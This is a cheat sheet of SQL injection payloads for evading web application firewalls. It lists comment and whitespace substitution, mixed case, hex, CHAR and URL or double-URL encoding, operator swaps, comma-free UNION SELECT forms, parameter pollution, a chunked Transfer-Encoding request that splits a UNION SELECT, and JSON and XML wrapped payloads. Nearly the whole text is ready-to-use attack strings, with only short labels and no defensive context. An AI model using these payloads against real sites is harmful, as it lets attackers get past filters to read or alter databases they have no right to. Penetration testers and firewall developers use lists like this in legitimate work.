WAF Bypass

/**/                    →  SELECT/**/username/**/FROM/**/users
+                       →  SELECT+username+FROM+users
%20                     →  SELECT%20username%20FROM%20users
%09 (tab)               →  SELECT%09username%09FROM%09users
%0a (newline)           →  SELECT%0ausername%0aFROM%0ausers
%0d                     →  carriage return
()                      →  SELECT(username)FROM(users)

-- comment
--+ comment
# comment
/*comment*/
/*!50000 SELECT*/ 1     -- MySQL version-specific comment
;%00                    -- Null byte

SeLeCt username FrOm users
sElEcT uSeRnAmE fRoM uSeRs

SELECT * FROM users WHERE username=0x61646d696e     -- 'admin' in hex

SELECT * FROM users WHERE username=CHAR(97,100,109,105,110)

SELECT * FROM users WHERE username="admin"

UN/**/ION SE/**/LECT
UNiOn SeLeCt
UNION ALL SELECT
UNION%0aSELECT
/*!UNION*/ /*!SELECT*/

SE/**/LECT
SeLeCt
%53%45%4c%45%43%54          -- URL-encoded

|| instead of OR
&& instead of AND

-- UNION SELECT without commas
UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

-- SUBSTRING without comma
SUBSTRING(database() FROM 1 FOR 1)

-- LIMIT without comma
LIMIT 1 OFFSET 0

LIKE instead of =
IN (value) instead of =value
BETWEEN value AND value
REGEXP 'pattern'

' → %27
= → %3d
  → %20
# → %23
/ → %2f

' → %2527
  → %2520

' → %u0027
< → %u003c

0x61646d696e = 'admin'
SELECT * FROM users WHERE name=0x61646d696e

CONCAT('ad','min')
'ad' 'min'              -- Adjacent strings auto-concat

'ad'+'min'

'ad'||'min'

'ad'||'min'

?id=1&id=UNION&id=SELECT&id=1,2,3

Transfer-Encoding: chunked

3
id=
5
1 UNI
7
ON SELE
5
CT 1
0

{"id": "1 UNION SELECT 1,2,3-- -"}

<id>1 UNION SELECT 1,2,3-- -</id>